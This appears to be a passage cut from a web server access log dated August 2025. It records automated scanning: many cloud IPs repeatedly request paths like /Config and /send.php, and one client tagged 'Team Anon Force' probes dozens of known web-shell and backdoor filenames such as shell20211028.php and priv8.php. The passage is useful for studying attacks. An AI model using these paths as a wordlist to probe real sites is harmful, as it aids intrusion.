AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 156.146.41.222 - - [12/Aug/2025:06:11:43 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 146.190.11.185 - - [12/Aug/2025:06:12:32 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:06:12:32 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 164.90.241.135 - - [12/Aug/2025:06:12:32 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 159.203.144.167 - - [12/Aug/2025:06:12:32 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 152.42.157.60 - - [12/Aug/2025:06:13:32 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 159.89.216.7 - - [12/Aug/2025:06:13:32 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 174.138.112.39 - - [12/Aug/2025:06:13:32 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 170.64.252.169 - - [12/Aug/2025:06:13:32 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 209.38.125.40 - - [12/Aug/2025:06:23:28 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 144.126.240.247 - - [12/Aug/2025:06:23:28 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 146.190.203.144 - - [12/Aug/2025:06:23:28 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 146.190.190.67 - - [12/Aug/2025:06:23:28 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 149.102.237.41 - - [12/Aug/2025:06:25:48 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 209.38.125.40 - - [12/Aug/2025:06:25:48 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.22.91.139 - - [12/Aug/2025:06:25:48 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 156.146.41.214 - - [12/Aug/2025:06:25:48 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 68.183.245.101 - - [12/Aug/2025:06:26:29 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:06:26:29 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [12/Aug/2025:06:26:29 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 86.8.204.43 - - [12/Aug/2025:06:26:29 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 173.252.79.5 - - [12/Aug/2025:06:35:34 -0400] "GET /teeth-implant HTTP/1.1" 301 244 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" 152.42.157.60 - - [12/Aug/2025:06:41:28 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 159.89.216.7 - - [12/Aug/2025:06:41:29 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 170.64.252.169 - - [12/Aug/2025:06:41:29 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 174.138.112.39 - - [12/Aug/2025:06:41:29 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.102.237.41 - - [12/Aug/2025:06:41:46 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 209.38.125.40 - - [12/Aug/2025:06:41:46 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.22.91.139 - - [12/Aug/2025:06:41:46 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 156.146.41.214 - - [12/Aug/2025:06:41:46 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 68.183.245.101 - - [12/Aug/2025:06:42:13 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:06:42:13 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [12/Aug/2025:06:42:14 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 86.8.204.43 - - [12/Aug/2025:06:42:14 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:06:42:17 -0400] "GET /wp-content/uploads/wpr-addons/forms/b1ack.php HTTP/1.1" 301 280 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:42:21 -0400] "GET /wp-content/plugins/fix/up.php HTTP/1.1" 301 264 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:42:25 -0400] "GET /wp-content/themes/twentyfive/include.php HTTP/1.1" 301 275 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:42:29 -0400] "GET /wp-content/plugins/wordpresss3cll/includes.php HTTP/1.1" 301 281 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:42:34 -0400] "GET /defaults.php HTTP/1.1" 301 247 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:42:38 -0400] "GET /simple.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:42:42 -0400] "GET /about.php HTTP/1.1" 301 244 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:42:46 -0400] "GET /install.php HTTP/1.1" 301 246 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:42:51 -0400] "GET /dropdown.php HTTP/1.1" 301 247 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:42:55 -0400] "GET /chosen.php?p= HTTP/1.1" 301 248 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:42:59 -0400] "GET /wp-content/plugins/yyobang/mar.php HTTP/1.1" 301 269 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:43:03 -0400] "GET /shell20211028.php HTTP/1.1" 301 252 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:43:08 -0400] "GET /wp-content/plugins/press/wp-class.php HTTP/1.1" 301 272 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:43:12 -0400] "GET /xxl.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:43:16 -0400] "GET /wp-content/plugins/press/wp-class.php HTTP/1.1" 301 272 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:43:20 -0400] "GET /fm1.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:43:24 -0400] "GET /ws.php HTTP/1.1" 301 241 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:43:28 -0400] "GET /wp-content/plugins/core/include.php HTTP/1.1" 301 270 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:43:32 -0400] "GET /404.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:43:36 -0400] "GET /wp.php HTTP/1.1" 301 241 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:43:40 -0400] "GET /wp-head.php HTTP/1.1" 301 246 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:43:43 -0400] "GET /images/uploader.php HTTP/1.1" 301 254 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:43:47 -0400] "GET /mah.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:43:50 -0400] "GET /upload/upload.php HTTP/1.1" 301 252 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:43:55 -0400] "GET /ms.php HTTP/1.1" 301 241 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:43:59 -0400] "GET /wp-content/uploads/gravity_forms/g/f/f/b/ HTTP/1.1" 301 276 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:44:03 -0400] "GET /vuln.php HTTP/1.1" 301 243 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:44:07 -0400] "GET /gel4y.php HTTP/1.1" 301 244 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:44:11 -0400] "GET /plugins.php HTTP/1.1" 301 246 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:44:14 -0400] "GET /sts.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:44:18 -0400] "GET /wp-hoard.php HTTP/1.1" 301 247 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:44:22 -0400] "GET /wp-l0gin.php HTTP/1.1" 301 247 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:44:26 -0400] "GET /priv8.php HTTP/1.1" 301 244 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:44:30 -0400] "GET /wp-post-editor.php HTTP/1.1" 301 253 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:44:34 -0400] "GET /404.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:44:38 -0400] "GET /users.php HTTP/1.1" 301 244 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:44:42 -0400] "GET /classwithtostring.php HTTP/1.1" 301 256 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:44:47 -0400] "GET /wp-head.php HTTP/1.1" 301 246 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:44:51 -0400] "GET /admin.php HTTP/1.1" 301 244 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:44:55 -0400] "GET /about.php HTTP/1.1" 301 244 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:44:59 -0400] "GET /dropdown.php HTTP/1.1" 301 247 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:45:03 -0400] "GET /wp-header.php HTTP/1.1" 301 248 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:45:07 -0400] "GET /radio.php HTTP/1.1" 301 244 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:45:11 -0400] "GET /simple.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 206.189.247.132 - - [12/Aug/2025:06:45:15 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 164.90.241.135 - - [12/Aug/2025:06:45:15 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 146.190.11.185 - - [12/Aug/2025:06:45:15 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 159.203.144.167 - - [12/Aug/2025:06:45:15 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:06:45:16 -0400] "GET /cong.php HTTP/1.1" 301 243 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:45:23 -0400] "GET /options.php HTTP/1.1" 301 246 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:45:28 -0400] "GET /wp-content/index.php?x=ooo HTTP/1.1" 301 261 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:45:33 -0400] "GET /wp-admin/options.php HTTP/1.1" 301 255 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:45:37 -0400] "GET /wp-content/plugins/fix/up.php HTTP/1.1" 301 264 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:45:41 -0400] "GET /sts.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:45:45 -0400] "GET /wp-hoard.php HTTP/1.1" 301 247 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:45:49 -0400] "GET /1index.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:45:53 -0400] "GET /11index.php HTTP/1.1" 301 246 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:45:57 -0400] "GET /2index.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:46:01 -0400] "GET /3index.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:46:04 -0400] "GET /wp_wrong_datlib.php HTTP/1.1" 301 254 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:46:09 -0400] "GET 